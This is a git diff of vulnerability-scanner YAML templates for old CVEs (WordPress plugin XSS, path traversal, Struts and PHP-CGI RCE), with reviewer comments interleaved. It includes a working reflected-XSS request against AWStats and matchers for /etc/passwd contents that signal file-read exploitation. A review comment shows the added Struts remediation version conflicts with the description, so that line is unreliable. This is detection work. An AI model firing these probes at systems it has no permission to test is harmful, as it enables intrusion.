fb203bd625..a1b5beded0 100644 --- a/cves/2011/CVE-2011-5106.yaml +++ b/cves/2011/CVE-2011-5106.yaml 
@@ -1,11 +1,17 @@ id: CVE-2011-5106 info: - name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + - https://wordpress.org/plugins/flexible-custom-post-type/#developers + - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type + - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ + classification: + cve-id: CVE-2011-5106 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5107.yaml b/cves/2011/CVE-2011-5107.yaml index ef7a3e99a4..a66ddac418 100644 --- a/cves/2011/CVE-2011-5107.yaml +++ b/cves/2011/CVE-2011-5107.yaml 
@@ -1,11 +1,17 @@ id: CVE-2011-5107 info: - name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 + description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ + - http://www.securityfocus.com/bid/50743 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 + - http://www.securityfocus.com/archive/1/520590/100/0/threaded + classification: + cve-id: CVE-2011-5107 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5179.yaml b/cves/2011/CVE-2011-5179.yaml index fc3dcab6fe..69c024bbb5 100644 --- a/cves/2011/CVE-2011-5179.yaml +++ b/cves/2011/CVE-2011-5179.yaml 
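Review bot: The first added reference item holds two URLs separated by a space (`- https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/...`), which YAML reads as one string, so the Acunetix link is not a usable reference and any tooling that validates URLs will reject the entry; this assumes the page's line collapsing did not simply swallow a `+ -` marker between them. Split it into two items: `- https://nvd.nist.gov/vuln/detail/CVE-2011-5107` followed by `- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/`. The CVE-2012-0392 hunk has the same two-URLs-in-one-item problem in its first reference entry.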
@@ -1,11 +1,17 @@ id: CVE-2011-5179 info: - name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) + name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 + - http://www.securityfocus.com/bid/50824 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 + - http://www.securityfocus.com/archive/1/520662/100/0/threaded + classification: + cve-id: CVE-2011-5179 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml index c7e74be15b..d50e65e43c 100644 --- a/cves/2011/CVE-2011-5181.yaml +++ b/cves/2011/CVE-2011-5181.yaml 
@@ -1,11 +1,17 @@ id: CVE-2011-5181 info: - name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + - http://www.securityfocus.com/bid/50778 + - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ + - http://osvdb.org/77338 + classification: + cve-id: CVE-2011-5181 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml index 5412865a18..63641aacf6 100644 --- a/cves/2011/CVE-2011-5265.yaml +++ b/cves/2011/CVE-2011-5265.yaml 
@@ -1,11 +1,17 @@ id: CVE-2011-5265 info: - name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) + name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 + - http://osvdb.org/77337 + - http://www.securityfocus.com/bid/50779 + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0120.html + classification: + cve-id: CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index 011cc75b69..40e158645e 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml 
@@ -5,8 +5,15 @@ info: author: pikpikcu severity: critical description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 - tags: cve,cve2012,apache,rce,struts + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 + - http://www.exploit-db.com/exploits/18329 + - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html + - http://secunia.com/advisories/47393 + remediation: Developers should immediately upgrade to at least Struts 2.3.18. + classification: + cve-id: CVE-2012-0392 + tags: cve,cve2012,apache,rce,struts,java requests: - method: GET @@ -18,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml index 5e2ad102d4..bda61c73ec 100644 --- a/cves/2012/CVE-2012-0896.yaml +++ b/cves/2012/CVE-2012-0896.yaml 
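Review bot: The added `remediation: Developers should immediately upgrade to at least Struts 2.3.18.` names a version that does not match the unchanged description, which says the flaw affects Struts "before 2.3.1.1"; one of the two is wrong and a reader acting on the remediation cannot tell which. Verify the fixed release against the S2-008 advisory the hunk links to and make the two fields agree, e.g. `remediation: Upgrade to Apache Struts 2.3.1.1 or later.` if the description is right.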
@@ -4,11 +4,15 @@ info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo severity: high - description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - https://www.cvedetails.com/cve/CVE-2012-0896 - tags: cve,cve2012,lfi,wordpress,wp-plugin + - http://secunia.com/advisories/47529 + - http://plugins.trac.wordpress.org/changeset/488883/count-per-day + classification: + cve-id: CVE-2012-0896 + tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml index 728c0ccd73..fd9c3dfd13 100644 --- a/cves/2012/CVE-2012-0901.yaml +++ b/cves/2012/CVE-2012-0901.yaml 
@@ -1,11 +1,16 @@ id: CVE-2012-0901 info: - name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) + name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 + - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 + classification: + cve-id: CVE-2012-0901 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml index 549281d0ab..eef133b20b 100644 --- a/cves/2012/CVE-2012-0981.yaml +++ b/cves/2012/CVE-2012-0981.yaml 
@@ -4,10 +4,14 @@ info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. reference: - https://www.exploit-db.com/exploits/18435 - https://www.cvedetails.com/cve/CVE-2012-0981 + - http://secunia.com/advisories/47802 + - http://www.exploit-db.com/exploits/18435 + classification: + cve-id: CVE-2012-0981 tags: cve,cve2012,lfi,phpshowtime requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml index 338de87d83..3a27e8c3a6 100644 --- a/cves/2012/CVE-2012-0991.yaml +++ b/cves/2012/CVE-2012-0991.yaml @@ -8,7 +8,11 @@ info: reference: - https://www.exploit-db.com/exploits/36650 - https://www.cvedetails.com/cve/CVE-2012-0991 - tags: cve,cve2012,lfi,openemr + - http://osvdb.org/78729 + - http://www.securityfocus.com/bid/51788 + classification: + cve-id: CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml index b096e5a0ba..2d2791b54e 100644 --- a/cves/2012/CVE-2012-0996.yaml +++ b/cves/2012/CVE-2012-0996.yaml 
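Review bot: The added reference `- http://www.exploit-db.com/exploits/18435` duplicates the existing `- https://www.exploit-db.com/exploits/18435` two lines above it, differing only in scheme. Drop the added http entry rather than listing the same advisory twice.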
@@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/36784 - https://www.cvedetails.com/cve/CVE-2012-0996 + - https://www.htbridge.ch/advisory/HTB23071 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2012-0996 tags: cve,cve2012,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml index 40b0d31332..f16733f1e9 100644 --- a/cves/2012/CVE-2012-1226.yaml +++ b/cves/2012/CVE-2012-1226.yaml @@ -8,7 +8,12 @@ info: reference: - https://www.exploit-db.com/exploits/36873 - https://www.cvedetails.com/cve/CVE-2012-1226 - tags: cve,cve2012,lfi + - http://www.securityfocus.com/archive/1/521583 + - http://www.vulnerability-lab.com/get_content.php?id=428 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2012-1226 + tags: cve,cve2012,lfi,dolibarr,traversal requests: - method: GET @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index 0a1111e02c..9d3b2cfa7f 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml 
@@ -1,14 +1,18 @@ id: CVE-2012-1823 info: - name: PHP CGI v5.3.12/5.4.2 RCE + name: PHP CGI v5.3.12/5.4.2 Remote Code Execution author: pikpikcu severity: critical + description: | + sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - description: | - sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + - https://bugs.php.net/bug.php?id=61910 + - http://www.php.net/ChangeLog-5.php#5.4.2 + classification: + cve-id: CVE-2012-1823 tags: rce,php,cve,cve2012 requests: @@ -22,12 +26,13 @@ requests: matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status status: - 200 + +# Enhanced by mp on 2022/04/04 diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index a176328129..754535a598 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
@@ -1,11 +1,17 @@ id: CVE-2012-1835 info: - name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 + - http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html + - http://www.securityfocus.com/bid/52986 + - https://www.htbridge.com/advisory/HTB23082 + classification: + cve-id: CVE-2012-1835 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -32,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml index b41122ff02..ba5d5cbe03 100644 --- a/cves/2012/CVE-2012-2371.yaml +++ b/cves/2012/CVE-2012-2371.yaml 
@@ -1,11 +1,17 @@ id: CVE-2012-2371 info: - name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) + name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 + - http://secunia.com/advisories/49143 + - http://www.openwall.com/lists/oss-security/2012/05/15/12 + - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-2371 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml old mode 100755 new mode 100644 index d624c59d99..f130b705fd --- a/cves/2012/CVE-2012-3153.yaml +++ b/cves/2012/CVE-2012-3153.yaml 
@@ -5,12 +5,16 @@ info: author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | - Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 + - https://www.oracle.com/security-alerts/cpuoct2012.html + - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html + classification: + cve-id: CVE-2012-3153 tags: cve,cve2012,oracle,rce requests: @@ -45,3 +49,5 @@ requests: name: linux_working_path regex: - "/.*/showenv" + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index ed80489fb4..8c40135569 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml 
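Review bot: The new `cve-id: CVE-2012-3153` sits directly under an unchanged reference to `https://nvd.nist.gov/vuln/detail/CVE-2012-3152`, so the template's classification and its NVD link now point at two different CVE identifiers. Since the file is named CVE-2012-3153.yaml the classification is presumably the intended one; if so the reference should be corrected to `- https://nvd.nist.gov/vuln/detail/CVE-2012-3153`, otherwise the classification and filename need revisiting. The hunk gives no way to tell which is correct, so this should be checked against NVD before merging.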
@@ -1,12 +1,17 @@ id: CVE-2012-4242 info: - name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html + - http://www.securityfocus.com/bid/55622 + classification: + cve-id: CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin - description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml index 7bc7888e98..e9211386c2 100644 --- a/cves/2012/CVE-2012-4253.yaml +++ b/cves/2012/CVE-2012-4253.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.exploit-db.com/exploits/37129 - https://www.cvedetails.com/cve/CVE-2012-4253 + - http://www.osvdb.org/81609 + - http://www.osvdb.org/81615 + classification: + cve-id: CVE-2012-4253 tags: cve,cve2012,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml index 99a6f52d88..be18341253 100644 --- a/cves/2012/CVE-2012-4273.yaml +++ b/cves/2012/CVE-2012-4273.yaml 
@@ -1,11 +1,17 @@ id: CVE-2012-4273 info: - name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 + - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ + - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + classification: + cve-id: CVE-2012-4273 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml new file mode 100644 index 0000000000..4a35ca2a5e --- /dev/null +++ b/cves/2012/CVE-2012-4547.yaml 
@@ -0,0 +1,40 @@
+id: CVE-2012-4547
+
+info:
+ name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+ reference:
+ - https://www.exploit-db.com/exploits/36164
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-4547
+ - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ - http://openwall.com/lists/oss-security/2012/10/29/7
+ classification:
+ cve-id: CVE-2012-4547
+ tags: cve,cve2020,xss,awstats
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+ - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml
index 5c198776f4..d5f361f8f6 100644
--- a/cves/2012/CVE-2012-4768.yaml
+++ b/cves/2012/CVE-2012-4768.yaml
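Review bot: The new template tags itself `cve,cve2020,xss,awstats` while its id, classification and every reference say 2012, so it will be excluded from `cve2012` tag runs and wrongly included in `cve2020` ones; the line should read `tags: cve,cve2012,xss,awstats`. Separately, the body matcher's only word is shown here as the empty string (`- ""`), which, if it is literally what the file contains, matches every response and leaves the status and `text/html` header checks as the sole evidence of reflection; more likely an HTML-looking token was stripped when the page was rendered, so confirm the committed file carries the intended reflected marker.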
@@ -1,11 +1,17 @@ id: CVE-2012-4768 info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. - reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt + - http://osvdb.org/85319 + - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + classification: + cve-id: CVE-2012-4768 tags: cve,cve2012,wordpress,xss,wp-plugin requests: @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml index 8b3e35a428..1e1bfafaff 100644 --- a/cves/2012/CVE-2012-4878.yaml +++ b/cves/2012/CVE-2012-4878.yaml 
@@ -4,11 +4,15 @@ info: name: FlatnuX CMS - Directory Traversal author: daffainfo severity: high - description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. reference: - https://www.exploit-db.com/exploits/37034 - https://www.cvedetails.com/cve/CVE-2012-4878 - tags: cve,cve2012,lfi + - http://www.vulnerability-lab.com/get_content.php?id=487 + - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html + classification: + cve-id: CVE-2012-4878 + tags: cve,cve2012,lfi,traversal requests: - method: GET @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml index c458850e5e..9a3d75d231 100644 --- a/cves/2012/CVE-2012-4889.yaml +++ b/cves/2012/CVE-2012-4889.yaml 
@@ -1,13 +1,17 @@ id: CVE-2012-4889 info: - name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS) + name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. reference: - https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 + - http://osvdb.org/80873 + - http://osvdb.org/80872 + classification: + cve-id: CVE-2012-4889 tags: cve,cve2012,xss,manageengine requests: @@ -30,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml index 58679a3d38..ea6daf7459 100644 --- a/cves/2012/CVE-2012-4940.yaml +++ b/cves/2012/CVE-2012-4940.yaml 
